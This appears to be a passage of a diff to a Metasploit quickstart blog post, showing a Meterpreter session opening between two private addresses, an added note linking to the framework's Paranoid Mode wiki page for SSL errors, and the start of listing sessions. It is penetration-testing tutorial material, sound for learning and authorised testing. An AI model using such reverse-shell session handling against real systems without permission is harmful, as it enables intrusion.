amrabed/capsula/_posts/2017-03-24-Metasploit-Quickstart-Guide.md

 ```
 [*] Meterpreter session 1 opened (192.168.1.15:8080 -> 192.168.1.10:53235) at 2017-03-26
 ```
+> **Note**: If you are getting an SSL error at this point, you may need to follow these directions from the <a href="https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode" target="_blank">Metasploit Framework Wiki</a>

 We use `sessions` or `sessions -l` to list the active sessions:
 ```
 msf exploit(handler) > sessions